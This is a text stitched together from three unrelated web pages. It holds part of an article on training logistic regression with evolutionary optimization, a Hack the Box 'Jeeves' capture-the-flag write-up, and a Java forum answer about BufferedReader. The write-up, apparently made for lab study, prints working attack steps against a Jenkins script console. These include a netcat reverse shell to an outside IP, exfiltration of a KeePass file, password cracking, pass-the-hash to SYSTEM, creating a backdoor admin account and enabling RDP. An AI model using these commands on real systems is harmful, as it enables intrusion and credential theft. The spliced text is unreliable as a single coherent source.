a fairly difficult problem. Quick Summary of Logistic Regression Classification Logistic regression classification is relatively simple. For a dataset with n predictor variables, there will be n weights plus one special weight called a bias. Weights and biases are just numeric constants with values like -1.2345 and 0.9876. To make a prediction, you sum the products of each predictor value and its associated weight and then add the bias. The sum is often given the symbol z. Then you take the logistic sigmoid of z to get a p-value. If the p-value is less than 0.5 then the prediction is class 0 and if the p-value is greater than or equal to 0.5 then the prediction is class 1. For example, suppose you have a dataset with three predictor variables and suppose that the three associated weight values are (0.20, -0.40, 0.30) and the bias value is 1.10. If an item to predict has values (5.0, 6.0, 7.0) then: z = (0.20 * 5.0) + (-0.40 * 6.0) + (0.30 * 7.0) + 1.10 = 1.80 p = 1.0 / (1.0 + exp(-1.80)) = 0.8581 Because p is greater than or equal to 0.5 the predicted class is 1. The function f(x) = 1.0 / (1.0 + exp(-x)) is called the logistic sigmoid function. The function exp(x) is Euler's number, approximately 2.718, raised to the power of x. f(x) = 1.0 / (1.0 + exp(-x)) exp(x) Determining the values of the weights and bias is called training the model. In addition to evolutionary optimization, there are many other techniques that can be used to train a logistic regression model. Three common training techniques for logistic regression are stochastic gradient descent (SGD), iterated Newton-Raphson, and L-BFGS optimization. Understanding Evolutionary Optimization The images in Figure 3 illustrate the key ideas of evolutionary optimization. Because the banknote data has four predictors/features, a logistic regression model solution will have five values – four weights and one bias. Evolutionary optimization creates a population of solutions. The demo uses a population size of six. Each solution has an associated error. The demo uses mean squared error between computed outputs (values between 0.0 and 1.0) and correct outputs (0 or 1). Evolutionary optimization is an iterative process. In pseudo-code: create a population of (random) solutions loop maxGen times pick two good solutions use good solutions to create a child solution mutate child slightly replace a bad solution with child solution create a random solution replace a bad solution with the random solution end-loop return best solution found If parent1 and parent2 are two good (low error) solutions in the population, to create a child solution you start by generating a random crossover index. Then the child receives the values from the left part of parent1 and the right part of parent2. An alternative approach is to create an additional second child with the right part of parent1 and the left part of parent2. Mutation is an important part of evolutionary optimization. The approach used in the demo program is: loop each cell of child solution generate a random probability p if p is small give cell a new random value end-loop A key task when using evolutionary optimization is selecting relatively good and bad solutions so that you can use good solutions to generate a new child solution, and you can replace a bad solution with a child solution or a new random solution. The demo program uses a technique called tournament selection. To select a good solution: set alpha = value between 0 percent and 100 percent select a random alpha percent subset of population indices return best index (lowest error) of subset Suppose, as in the demo, the population size is six and so the indices of the population are (0, 1, 2, 3, 4, 5). And suppose alpha is set to 0.50. This means that a random 0.50 * 6 = 3 indices are selected, for example, (4, 0, 2). From these three, the solution with the lowest error is selected. The alpha parameter is called the selection pressure. The larger alpha is, the more likely you are to get the absolute best solution in the population. A good value for alpha is problem-dependent and must be determined by trial and error, but 0.80 is a reasonable value to start. To select a random subset of size n from all population indices, the demo program starts with all indices (0, 1, 2, 3, 4, 5) then shuffles the indices using the Fisher-Yates mini-algorithm, giving for example (3, 5, 0, 1, 4, 2), and then returns the first n indices (3, 5, 0). Simple and effective. Selecting the index of a relatively bad solution is exactly like selecting a good solution except that after sampling you return the index of the solution that has the highest error. "LogisticEvo" LogisticEvoProgram.cs and then in the editor window I renamed class Program to class LogisticEvoProgram to match the file name. The structure of the demo program, with a few minor edits to save space, is shown in Listing 1. Listing 1. Evolutionary Optimization Demo Program Structure using System; namespace LogisticEvo { class LogisticEvoProgram { static void Main(string[] args) { Console.WriteLine("Evolutionary optimization"); Console.WriteLine("Banknote authenticity"); // Banknote Authentication subset double[][] trainX = new double[40][]; trainX[0] = new double[] { 3.6216, 8.6661, -2.8073, -0.44699 }; trainX[1] = new double[] { 4.5459, 8.1674, -2.4586, -1.4621 }; . . . trainX[38] = new double[] { -3.5801, -12.9309, 13.1779, -2.5677 }; trainX[39] = new double[] { -1.8219, -6.8824, 5.4681, 0.057313 }; int[] trainY = new int[] { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 };); Console.WriteLine("Best weights found:"); ShowVector(wts); Console.WriteLine("End demo "); Console.ReadLine(); } // Main static double[] Train(double[][] trainX, int[] trainY, int popSize, int maxGen, double alpha, double sigma, double omega, double mRate, int seed) { . . } static double[] MakeSolution(int nw, Random rnd) { . . } static double[][] MakePopulation(int popSize, int nw, Random rnd) { . . } static double[] MakeChild(double[][] pop, int[] parents, Random rnd) { . . } static void Mutate(double[] child, double mRate, Random rnd) { . . } static int BestSolution(double[] errors) { . . } static int SelectGood(double[] errors, double pct, Random rnd) { . . } static int[] SelectTwo(double[] errors, double pct, Random rnd) { . . } static int SelectBad(double[] errors, double pct, Random rnd) { . . } static void Shuffle(int[] vec, Random rnd) { . . } static double ComputeOutput(double[] x, double[] wts) { . . } static double LogSig(double x) { . . } static double Accuracy(double[][] dataX, int[] dataY, double[] wts) { . . } static double Error(double[][] dataX, int[] dataY, double[] wts) { . . } static void ShowVector(double[] v) { . . } } } // ns The program isn't as complicated as it might appear because most of the functions are relatively small and simple helpers. All of the program logic is contained in the Main() method. The demo uses a static method approach rather than an OOP approach for simplicity. All normal error checking has been removed to keep the main ideas as clear as possible. The demo begins by setting up the 40-item training data: double[][] trainX = new double[40][]; trainX[0] = new double[] { 3.6216, 8.6661, -2.8073, -0.44699 }; . . trainX[39] = new double[] { -1.8219, -6.8824, 5.4681, 0.057313 }; int[] trainY = new int[40] { 0, 0, . . 1 }; In a non-demo scenario you'd likely want to store your training data as a text file and then you'd read the training data into memory using helper functions along the lines of: double[][] trainX = MatLoad("..\\trainData.txt", new int[] { 0, 1, 2, 3 }, ","); int[] trainY = VecLoad("..\\trainData.txt", 4, ","); Because of the way logistic regression classification output is computed, it's almost always a good idea to normalize your training data so that small predictor values (such as an age of 35) aren't overwhelmed by large predictor values (such as an annual income of 65,000.00). The three most common normalization techniques are min-max normalization, z-score normalization and order of magnitude normalization. Because the banknote predictor values all are roughly within the same magnitude, the demo does not normalize the training data.. After setting up the training data, the demo program trains the model using these statements:); The population size and maximum number of generations to evolve are hyperparameters that must be determined by trial and error. The values of hyperparameters alpha, sigma and omega control selection pressure for picking good parents to breed, picking a bad solution for replacement by a child, and picking a bad solution for replacement by a new random solution. The mutation rate controls how many cells in a newly created child solution will be randomly mutated. In my experience, of the six training hyperparameters, evolutionary optimization is more sensitive to the mutation rate than the other parameters. The Train() function accepts a seed value which is used to create a local Random object. The seed value in the demo, 3, was used only because it gave a representative result. Implementation Details The demo program defines a MakeSolution() function like so: static double[] MakeSolution(int nw, Random rnd) { double lo = -1.0; double hi = 1.0; double[] soln = new double[nw]; for (int i = 0; i < nw; ++i) soln[i] = (hi - lo) * rnd.NextDouble() + lo; return soln; } The function creates a vector with a size equal to the number of weights (including the bias) needed for a logistic regression problem. Each cell of the vector holds a random value in the range [-1.0, +1.0] which is a problem-dependent hyperparameter. The code to create a child solution from two parent solutions is: static double[] MakeChild(double[][] pop, int[] parents, Random rnd) { int nw = pop[0].Length; // num wts including bias int idx = rnd.Next(1, nw); // crossover double[] child = new double[nw]; for (int j = 0; j < idx; ++j) child[j] = pop[parents[0]][j]; // left for (int j = idx; j < nw; ++j) child[j] = pop[parents[1]][j]; // right return child; } The child contains the values of parent1 from index [0] up to but not including a randomly generated [index], and from [index] to the last cell of parent2. The code to mutate a newly created child solution is defined in function Mutate() and is: static void Mutate(double[] child, double mRate, Random rnd) { double lo = -1.0; double hi = 1.0; for (int i = 0; i < child.Length; ++i) { double p = rnd.NextDouble(); if (p < mRate) // rarely child[i] = (hi - lo) * rnd.NextDouble() + lo; } return; } The function traverses a child solution and modifies each cell independently with probability mRate. Because the function modifies its child parameter directly, I use an explicit return statement as a form of documentation. Wrapping Up Evolutionary optimization is a meta-heuristic, meaning the technique is a set of general guidelines rather than a rigid algorithm. This means you have many design choices, such as creating two children at a time instead of one, using two crossover points instead of one for mutation, and so on. Based on my experience with evolutionary optimization, simplicity is a better approach than sophistication. Evolutionary optimization can be used to train any kind of machine learning model that has a well-defined solution and a way to compute error for a solution. In particular, evolutionary optimization can be used to train a neural network or any kernel-based model. The main advantage of evolutionary optimization is that, unlike many machine learning training algorithms, it does not require a Calculus gradient. The main disadvantage of evolutionary optimization is that it usually requires far more processing time than gradient-based techniques. Evolutionary optimization has existed for many years but there's been renewed interest in the technique recently. Even though I have no solid survey data, there seems to be a growing sense among researchers that regular deep neural networks, which rely on Calculus gradients, are reaching the limits of their capabilities. New approaches, such as neuromorphic computing, are gaining increased attention. Many of these newer approaches cannot use gradients and so evolutionary optimization is one possible option for
https://visualstudiomagazine.com/articles/2020/02/21/evolutionary-optimization.aspx
CC-MAIN-2020-40
refinedweb
2,644
55.34
{Hack the Box} \\ Jeeves Write-Up Three cheers for corporate malware. The year is 2005. Avatar: The Last Airbender has just started airing. The sweet melody of asphyxiating cows plays in the background as you try to start your dial-up connection. Obi Wan gets the high ground, but Palpatine gets the last laugh. Ask Jeeves had a special place in our hearts. Glory days. I shall wax nostalgic no longer. In the words of Nicko, let’s get stuck into this bad boy. Initial Scans POOOOOORT SCAN. root@kali:~# nmap -sC -sV -o nmap.log 10.10.10.63 Starting Nmap 7.60 ( ) at 2018-05-23 16:32 EDT Nmap scan report for 10.10.10.63 Host is up (0.043s latency). Not shown: 996 Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 4h58m52s, deviation: 0s, median: 4h58m52s | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2018-05-23 21:31:56 |_ start_date: 2018-05-21 00:40:49 Service detection performed. Please report any incorrect results at . Nmap done: 1 IP address (1 host up) scanned in 54.33 seconds Put on a full port scan in the background too. Good habit to get used to. We’ve got two HTTP ports and some SMB going on here. ALSO WE’RE DEALING WITH WINDOWS. Hyperventilate at your leisure. We can try visiting both HTTP ports to see what we get. Start with port 80. Wow. Flashbacks to when Norton Antivirus sneakily installed Ask Jeeves and Internet Explorer 6 vomited toolbars. *shudder*. <> Seems like we’ve been had. Your world is a lie. They’re all dummy links. And the search bar directs us to error.html every time. This screenshot (assuming it’s legit) actually tells us a lot about the target machine. The Windows version and build number, ASP.NET version, SQL server version, and you get the idea. In any penetration test, knowing the version numbers of a bunch of different software for a target machine is incredibly valuable. You can use it to look up any existing vulnerabilities or potential misconfigurations. DuckDuckGo is your friend. Google is evil now so it’s an unwilling accomplice at best. Right now though, we can’t really use any of this information since we don’t have any related open ports. Once we get some kind of user access to Jeeves though, we might need this information, so jot it down somewhere. Port 50000 doesn’t have much to show for itself either. We do get another piece of info though, the web server type and version. A quick Google (*ahem* DDG) search for Jetty doesn’t really give us any juicy exploits, so we’ll table it for now, and come back to it if we get really stuck later. This is where I start throwing dictionaries. Let’s set up a couple Gobuster sessions on the two HTTP ports (80, 50000) so we can maybe find some tasty directories, and while they marinate, we can go ahead and mess around with SMB a bit. root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.63 Gobuster v1.2 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : [+] Threads : 10 [+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes : 200,204,301,302,307 ===================================================== ===================================================== The Server Message Block (SMB) protocol is a way to access shared files and printers and stuff on another network node. Usually used on Windows, but Unix systems have their own implementation (Samba). Kali has a few good tools installed to enumerate and interact with SMB ports. smbclient is useful if you need to list the shares available to you, along with user access permissions, and then actually accessing files. But before doing all that, we can use a handy script called enum4linux to give us a detailed overview. This also lets us know if we can access any accounts in the first place. I’ll save you the trouble here and say that this seems like a dead end. root@kali:~# enum4linux -a 10.10.10.63 Starting enum4linux v0.8.9 ( ) on Wed May 23 18:46:19 2018 ========================== | Target Information | ========================== Target ........... 10.10.10.63 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none =================================================== | Enumerating Workgroup/Domain on 10.10.10.63 | =================================================== [E] Can't find workgroup/domain =========================================== | Nbtstat Information for 10.10.10.63 | =========================================== Looking up status of 10.10.10.63 No reply from 10.10.10.63 ==================================== | Session Check on 10.10.10.63 | ==================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437. [E] Server doesn't allow session using username '', password ''. Aborting remainder of tests. Oh well. Back to Gobuster. Port 80 doesn’t really have anything interesting, but if we look at port 50000, we get something funny. ===================================================== /askjeeves (Status: 302) ===================================================== Let’s check it out. 302 is a redirect HTTP code in case you haven’t seen it before. Strap yourselves in. Jenkins? Groovy. Ask not what Jeeves can do for you. Not a very eventful ride. The redirect just added a forward slash. Quaint. BUT OMG, A JENKINS SERVER. And what’s more, we don’t even have to log in. We’ve got full access here. y i k e s. Look around a bit. Jenkins is an automation server so it’s sure to have some sort of direct access to the underlying machine. If you go to Manage Jenkins option under the top left menu, you’ll see a script console. Looks promising. Yep. Okay. Now you can go spend the next few days learning how to program in Groovy. Fun! Seriously though, it’s just like Java, but easier. If you can Java, you can Groovy. This looks like a tender spot, so let’s try to get some code execution going. It’s Windows, so keep that in mind when you write out commands. Groovy has a useful method to execute strings as shell commands called execute(). Let’s use that to see if we can get a directory list. This took a little tinkering to get right, but we’ve got code execution. Groovy Console: def cmd = "cmd.exe /c dir".execute(); println("${cmd.text}"); Result: Volume in drive C has no label. Volume Serial Number is BE50-B1C9 Directory of C:\Users\Administrator\.jenkins 05/21/2018 12:42 AM <DIR> . 05/21/2018 12:42 AM <DIR> .. 05/24/2018 05:26 AM 47 .owner 05/21/2018 12:42 AM 1,684 config.xml 05/21/2018 12:42 AM 156 hudson.model.UpdateCenter.xml 11/03/2017 10:43 PM 374 hudson.plugins.git.GitTool.xml 11/03/2017 10:33 PM 1,712 identity.key.enc 11/03/2017 10:46 PM 94 jenkins.CLI.xml 05/24/2018 04:54 AM 83,489 jenkins.err.log 11/03/2017 10:47 PM 360,448 jenkins.exe 11/03/2017 10:47 PM 331 jenkins.exe.config 05/21/2018 12:42 AM 4 jenkins.install.InstallUtil.lastExecVersion 11/03/2017 10:45 PM 4 jenkins.install.UpgradeWizard.state 11/03/2017 10:46 PM 138 jenkins.model.DownloadSettings.xml 12/24/2017 03:38 PM 2,688 jenkins.out.log 05/21/2018 12:41 AM 4 jenkins.pid 11/03/2017 10:46 PM 169 jenkins.security.QueueItemAuthenticatorConfiguration.xml 11/03/2017 10:46 PM 162 jenkins.security.UpdateSiteWarningsConfiguration.xml 11/03/2017 10:47 PM 74,271,222 jenkins.war 05/21/2018 12:41 AM 34,147 jenkins.wrapper.log 11/03/2017 10:49 PM 2,881 jenkins.xml 11/03/2017 10:33 PM <DIR> jobs 11/03/2017 10:33 PM <DIR> logs 05/21/2018 12:42 AM 907 nodeMonitors.xml 11/03/2017 10:33 PM <DIR> nodes 11/03/2017 10:44 PM <DIR> plugins 11/03/2017 10:47 PM 129 queue.xml.bak 11/03/2017 10:33 PM 64 secret.key 11/03/2017 10:33 PM 0 secret.key.not-so-secret 12/24/2017 03:47 AM <DIR> secrets 11/08/2017 09:52 AM <DIR> updates 11/03/2017 10:33 PM <DIR> userContent 11/03/2017 10:33 PM <DIR> users 11/03/2017 10:47 PM <DIR> war 11/03/2017 10:43 PM <DIR> workflow-libs 23 File(s) 74,760,854 bytes 12 Dir(s) 7,523,225,600 bytes free Excellent. Now I’d suggest taking a break. Sitting kills, people. Go make fried chicken or something. Alright, we’re back from our commercial break. Let’s get a reverse shell. Apparently Jeeves has PowerShell installed so that makes our job easier. Start up a web server on your local machine and put a copy of an nc.exe binary nearby where you won’t lose it. Along with netcat, Kali has a bunch of other cool Windows binaries for penetration testing stuff in /usr/share/windows-binaries. Look through it when you get the chance. If you don’t have it on your machine, just find it on the internet. The Windows machine we’re targeting is 32-bit so make sure the binary you use is also 32-bit. root@kali:~# ls -la /usr/share/windows-binaries/ total 1908 drwxr-xr-x 9 root root 4096 Feb 4 14:39 . drwxr-xr-x 472 root root 20480 May 21 18:24 .. drwxr-xr-x 2 root root 4096 Feb 4 14:39 backdoors drwxr-xr-x 2 root root 4096 Feb 4 14:39 enumplus -rwxr-xr-x 1 root root 53248 Aug 21 2017 exe2bat.exe drwxr-xr-x 2 root root 4096 Feb 4 14:39 fgdump drwxr-xr-x 2 root root 4096 Feb 4 14:39 fport drwxr-xr-x 5 root root 4096 Feb 4 14:39 hyperion -rwxr-xr-x 1 root root 23552 Aug 21 2017 klogger.exe drwxr-xr-x 2 root root 4096 Feb 4 14:39 mbenum drwxr-xr-x 4 root root 4096 Feb 4 14:39 nbtenum -rwxr-xr-x 1 root root 59392 Aug 21 2017 nc.exe //YEE -rwxr-xr-x 1 root root 311296 Aug 21 2017 plink.exe -rwxr-xr-x 1 root root 704512 Aug 21 2017 radmin.exe -rwxr-xr-x 1 root root 364544 Aug 21 2017 vncviewer.exe -rwxr-xr-x 1 root root 308736 Aug 21 2017 wget.exe -rwxr-xr-x 1 root root 66560 Aug 21 2017 whoami.exe root@kali:~/Documents/oscp/tools/windows_binaries# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ... Most of the time, netcat use is restricted or nonexistent on Windows machines, so it’s far easier to just upload our own and create TCP connections to our heart’s content. Back to the Groovy script console. Use the Powershell Invoke-WebRequest cmdlet (wget is so much less verbose, jeez) to grab netcat from your local machine. Groovy Console: def process = "powershell -command Invoke-WebRequest '' -OutFile nc.exe".execute(); println("${process.text}"); Make sure to write your own IP address connected to the tun0 interface (viewable with ifconfig). We need -OutFile to specify that we want to save the file contents to nc.exe because Invoke-WebRequest outputs them to the pipeline by default. Your Python server should show that Jeeves got our present. root@kali:~# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ... 10.10.10.63 - - [24/May/2018 01:07:41] "GET /nc.exe HTTP/1.1" 200 - List the directory contents again to make sure it’s there. We can keep using PowerShell because we want to avoid the aging travesty that is the Windows command line. Groovy Console: def process = "powershell -command dir".execute(); println("${process.text}"); Result: Directory: C:\Users\Administrator\.jenkins Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 11/3/2017 10:33 PM jobs d----- 11/3/2017 10:33 PM logs d----- 11/3/2017 10:33 PM nodes d----- 11/3/2017 10:44 PM plugins d----- 12/24/2017 2:47 AM secrets d----- 11/8/2017 8:52 AM updates d----- 11/3/2017 10:33 PM userContent d----- 11/3/2017 10:33 PM users d----- 11/3/2017 10:47 PM war d----- 11/3/2017 10:43 PM workflow-libs -a---- 5/24/2018 5:26 AM 47 .owner -a---- 5/21/2018 12:42 AM 1684 config.xml -a---- 5/21/2018 12:42 AM 156 hudson.model.UpdateCenter.xml -a---- 11/3/2017 10:43 PM 374 hudson.plugins.git.GitTool.xml -a---- 11/3/2017 10:33 PM 1712 identity.key.enc -a---- 11/3/2017 10:46 PM 94 jenkins.CLI.xml 5/24/2018 4:54 AM 83489 jenkins.err.log -a---- 11/3/2017 10:47 PM 360448 jenkins.exe -a---- 11/3/2017 10:47 PM 331 jenkins.exe.config -a---- 5/21/2018 12:42 AM 4 jenkins.install.InstallUtil.lastExecVersion -a---- 11/3/2017 10:45 PM 4 jenkins.install.UpgradeWizard.state -a---- 11/3/2017 10:46 PM 138 jenkins.model.DownloadSettings.xml 12/24/2017 2:38 PM 2688 jenkins.out.log -a---- 5/21/2018 12:41 AM 4 jenkins.pid -a---- 11/3/2017 10:46 PM 169 jenkins.security.QueueItemAuthenticatorConfiguration.xml -a---- 11/3/2017 10:46 PM 162 jenkins.security.UpdateSiteWarningsConfiguration.xml -a---- 11/3/2017 10:47 PM 74271222 jenkins.war -a---- 5/21/2018 12:41 AM 34147 jenkins.wrapper.log -a---- 11/3/2017 10:49 PM 2881 jenkins.xml -a---- 5/24/2018 6:06 AM 59392 nc.exe -a---- 5/21/2018 12:42 AM 907 nodeMonitors.xml -a---- 11/3/2017 10:47 PM 129 queue.xml.bak -a---- 11/3/2017 10:33 PM 64 secret.key -a---- 11/3/2017 10:33 PM 0 secret.key.not-so-secret Great. Now let’s set up a netcat listener on our local machine and connect back to it from the script console. root@kali:~# nc -lnvp 1337 listening on [any] 1337 ... Groovy Console: def process = "powershell -command ./nc.exe 10.10.14.5 1337 -e cmd.exe".execute(); //CHANGE IP PLS println("${process.text}"); Run it and check your listener. root@kali:~# nc -lnvp 1337 listening on [any] 1337 ... connect to [10.10.14.5] from (UNKNOWN) [10.10.10.63] 49678 Microsoft Windows [Version 10.0.10586] C:\Users\Administrator\.jenkins>whoami whoami jeeves\kohsuke C:\Users\Administrator\.jenkins> Delicious. Windows irks me Start off by invading Kohsuke’s privacy and rifling through his stuff. His Documents folder contains something interesting.,523,155,968 bytes free C:\Users\kohsuke\Documents> A quick Google (sigh) search show us that the .kdbx extension is most commonly used as a Keepass Password Database data file. Nice. It’s probably got some interesting credentials in there. Let’s get it onto our system with netcat file transfer witchery. Set up a listener on your local machine that redirects data to a .kdbx file. root@kali:~# nc -lnvp 4444 > CEH.kdbx listening on [any] 4444 ... Now on the command line for Jeeves, use the uploaded nc.exe to transfer the contents of CEH.kdbx to your machine. C:\Users\kohsuke\Documents>C:\Users\Administrator\.jenkins\nc.exe 10.10.14.5 4444 < CEH.kdbx C:\Users\Administrator\.jenkins\nc.exe 10.10.14.5 4444 < CEH.kdbx Your listener should have received the incoming connection. If so, exit netcat and you’ll see the file. root@kali:~# nc -lnvp 4444 > CEH.kdbx listening on [any] 4444 ... connect to [10.10.14.5] from (UNKNOWN) [10.10.10.63] 49693 ^C root@kali:~# ls -la CEH.kdbx -rw-r--r-- 1 root root 2846 May 23 02:08 CEH.kdbx root@kali:~# Great. Download KeePass if you don’t already have it. root@kali:~# apt search keepass Sorting... Done Full Text Search... Done keepass2/kali-rolling 2.38+dfsg-1 all Password manager keepass2-doc/kali-rolling 2.38+dfsg-1 all Password manager - Documentation keepassx/kali-rolling,now 2.0.3-1 i386 [installed] Cross Platform Password Manager keepassxc/kali-rolling 2.3.1+dfsg.1-1 i386 Cross Platform Password Manager kpcli/kali-rolling 3.1-3 all command line interface to KeePassX password manager databases libfile-keepass-perl/kali-rolling 2.03-1 all interface to KeePass V1 and V2 database files root@kali:~#apt install keepassx ... Open the KeePass file. root@kali:~/Documents/hack_the_box/jeeves# keepassx CEH.kdbx We shall not pass. We need a password. Let’s smash it. Luckily Kali saves our asses once again (I laughed when I saw there’s a keepass2john program. I love this). root@kali:~# keepass2john CEH.kdbx CEH:$keepass$*2*6000*222*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48 root@kali:~# Alright. We now have a hash, and, ignoring the name, we can now use hashcat to crack it. Save the hash to a text file. You’ll notice that the hash is invalid. Check out a list of hash examples to see that KeePass hashes start with $keepass$, and not CEH: (kind of obvious in hindsight). Remove that part. Now actually crack it. *5 minutes later* Nvm. It broke my laptop. Pro tip, don’t use the force option when hashcat tells you it’s a bad idea. My Kali Linux partition is no longer booting. Sigh. Sorry John. I still love you and stuff. Take me back, pls. root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt keepass-hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (KeePass [SHA256 AES 32/32 OpenSSL]) Press 'q' or Ctrl-C to abort, almost any other key for status moonshine1 (CEH) 1g 0:00:01:37 DONE (2018-05-26 03:38) 0.01027g/s 564.7p/s 564.7c/s 564.7C/s moonshine1 Use the "--show" option to display all of the cracked passwords reliably Session completed root@kali:~# Aaaand the password is moonshine1. Fire up KeePass again and enter the password. WOOH, got the password to his Walmart account. I kinda needed a few bags of potting soil and 4-ply toilet paper. Let’s use winexe to try to log in as admin with all these passwords. The most promising seems like the one under Backup stuff, which looks like a Windows NTLM hash. For this, we can use pth-winexe to pass in the hash directly to log in. No need to crack it. Scary stuff. root@kali:~# pth-winexe winexe version 1.1 This program may be freely redistributed under the terms of the GNU GPLv3 Usage: winexe [OPTION]... //HOST COMMAND Options: -h, --help Display help message -V, --version Display version number -U, --user=[DOMAIN/]USERNAME[%PASSWORD] Set the network username -A, --authentication-file=FILE Get the credentials from a file -N, --no-pass Do not ask for a password -k, --kerberos=STRING Use Kerberos, -k [yes|no] -d, --debuglevel=DEBUGLEVEL Set debug level --uninstall Uninstall winexe service after remote execution --reinstall Reinstall winexe service before remote execution --system Use SYSTEM account --profile Load user profile --convert Try to convert characters between local and remote code-pages --runas=[DOMAIN\]USERNAME%PASSWORD Run as the given user (BEWARE: this password is sent in cleartext over the network!) --runas-file=FILE Run as user options defined in a file --interactive=0|1 Desktop interaction: 0 - disallow, 1 - allow. If allow, also use the --system switch (Windows requirement). Vista does not support this option. --ostype=0|1|2 OS type: 0 - 32-bit, 1 - 64-bit, 2 - winexe will decide. Determines which version (32-bit or 64-bit) of service will be installed. root@kali:~#... Microsoft Windows [Version 10.0.10586] C:\Windows\system32>whoami whoami nt authority\system <------------ yah C:\Windows\system32> Successfully hacked. Now let’s grab the flags the fun way. I had no idea this was a thing until I started my OSCP practice. Mind was sufficiently blown. Through the Jeeves command line, make an account for yourself with admin privileges (Please don’t do this in a real environment. Use already existing accounts if you have to. And opening up a remote desktop port is pretty conspicuous. It’s just more fun this way). C:\Windows\system32>net user /add oneeb jeeved net user /add oneeb jeeved The command completed successfully. C:\Windows\system32>net localgroup administrators oneeb /add net localgroup administrators oneeb /add The command completed successfully. C:\Windows\system32> Now start up the Remote Desktop (RDP) service. C:\Windows\system32>reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 The operation completed successfully. C:\Windows\system32> Configure the firewall to let RDP connections in. C:\Windows\system32>netsh firewall set service remoteadmin enable netsh firewall set service remoteadmin enable Ok. C:\Windows\system32>netsh firewall set service remotedesktop enable netsh firewall set service remotedesktop enable Ok. C:\Windows\system32> Now use rdesktop on Kali to log in to your newly minted account. root@kali:~# rdesktop 10.10.10.63 Connection established using SSL. Enter your username and password and log in. Tah-dah. Beautiful isn’t it? Play around with it to your heart’s content. Now go to the admin desktop and grab that flag so I can sleep. Copy that file to your desktop so you can read it. Knickers twisted. I’m stumped. Since the root.txt file is always on the Administrator desktop, and there doesn’t seem to be some network inception stuff going on, let’s take a deeper look at the file with PowerShell. Make sure to run it as admin or you're going to have a bad time. Start by taking a look at Alternative Data Streams (ADS). MalwareBytes has a really good basic introduction to it. Basically ADS is a way for you to add data to a file that’s hidden from normal means of viewing, like through file explorer or printing the file out on a command line. You’ve got to use special directives to view these streams and it’s very easy for them to fly under the radar. They often get a bad rep because so much malware takes advantage of this. Note that these streams are a feature of the Windows New Technology File System (NTFS), so transferring the file to your Linux system, or even a FAT32 Windows file system will erase any streams the file may have. Anyway, let’s check to see if hm.txt has any other streams. Bingo. Read the contents of root.txt. PS C:\Users\oneeb\Desktop> get-content .\hm.txt -stream root.txt r00t_ha$h_th1ngi3 PS C:\Users\oneeb\Desktop> Done. Just make sure to delete your user account so Jeeves doesn’t axe murder you. Nighty night. This box was a doozy, if only because I hadn’t really done too much Windows hacking before. The OSCP PwK course gave me a good introduction, and banging my head against this box as I surfed the interwebs taught me quite a bit. Windows privelige escalation throws me for a loop sometimes. The FuzzySecurity guide to Windows priv. esc. really helped me develop a solid attack plan for when I’m stuck with a user account. Be sure to check it out! If you found this informative, be on the lookout for more write-ups. You can follow me on Twitter for the latest. Shoot me a message if you ever have any questions about how to get started in InfoSec. I’d be glad to help in any way that I can. Happy hacking!
https://medium.com/@OneebMalik/hack-the-box-jeeves-write-up-f1427462dc19
CC-MAIN-2019-04
refinedweb
4,007
69.79
in data. You can use InputStreamReader to read in data, the readln() will work just fine. In JDK 1.1, we can add additional filters to the input stream to enhance its capabilities. BufferedReader, for example will allow you to buffer the incoming bits. This allows for fewer read operations from the source, and improves the efficiency. Therefore, to read from the standard input, the following two lines will be what you want: BufferedReader in = new BufferedReader(new InputStreamReader(System.i String s = in.readLine(); As you can see, inputStreamReader could've done the job of reading the data. However, piping it through the buffered reader adds more efficiency to it. For a even more involved example of chaining multiple filters, try this program out: import java.io.*; class Lines { static String fileName = "test.in"; public static void main(String[] args) { try { FileInputStream in = new FileInputStream(fileName); LineNumberInputStream lineIn; lineIn = new LineNumberInputStream(in); DataInputStream dataIn = new DataInputStream(lineIn); while (dataIn.available() > 0) { String s = dataIn.readLine(); int lineNum = lineIn.getLineNumber(); System.out.println("Line " + lineNum + ": " + s); } } catch (IOException x) { System.out.println(x.getMe } } } Take a look, I'm sure you'll see how it works. If not, just post a message and I'll explain.
https://www.experts-exchange.com/questions/10071154/readLine-and-DataInputStream-vs-BufferedReader.html
CC-MAIN-2018-22
refinedweb
206
60.72
